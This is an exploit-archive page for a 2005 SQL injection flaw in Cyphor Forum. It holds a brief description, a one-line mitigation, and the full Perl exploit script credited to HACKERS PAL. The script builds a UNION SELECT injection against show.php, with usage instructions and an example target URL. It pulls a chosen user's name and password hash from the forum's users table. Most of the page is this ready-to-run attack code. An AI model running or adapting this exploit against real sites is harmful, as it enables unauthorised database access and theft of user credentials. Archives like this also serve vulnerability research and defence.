header-logo
Suggest Exploit
vendor:
Forum
by:
HACKERS PAL
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Forum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Cyphor Forum SQL Injection Exploit

This exploit allows an attacker to inject malicious SQL code into a vulnerable web application. The malicious code can be used to extract sensitive information from the database, such as user credentials. The exploit is written in Perl and takes two arguments, the full path of the vulnerable web application and the user ID of the target user. The exploit then retrieves the user name and the hash of the password from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

#!/bin/env perl
#//-----------------------------------------------------------#
#//        Cyphor Forum SQL Injection Exploit .. By HACKERS PAL
#//                   Greets For Devil-00 - Abducter - Almaster
#//                          http://WwW.SoQoR.NeT
#//-----------------------------------------------------------#

use LWP::Simple;

print "\n#####################################################";
print "\n#      Cyphor Forum Exploit By : HACKERS PAL        #";
print "\n#               Http://WwW.SoQoR.NeT                #";
if(!$ARGV[0]||!$ARGV[1]) {
print "\n# -- Usage:                                         #";
print "\n# -- perl $0 [Full-Path] 1                      #";
print "\n# -- Example:                                       #";
print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";
print "\n#     Greets To Devil-00 - Abducter - almastar      #";
print "\n#####################################################\n";
   exit(0);
} else {
print "\n#     Greets To Devil-00 - Abducter - almastar      #";
print "\n#####################################################\n";

       $web=$ARGV[0];
       $id=$ARGV[1];

$url = "show.php?fid=2&id=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,10%20from%20users%20where%20id=$id";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";

print "[+] User ID is : $id ";
$page =~ m/<span class=bigh>(.*?)<\/span>/ && print "\n[+] User Name is: $1\n";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$page =~ m/<span class=message>(.*?)<\/span>/ && print "[+] Hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

}

print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are Welcome\n\n";

# milw0rm.com [2005-11-14]

Navigation

Suggest Exploit

Services By CQR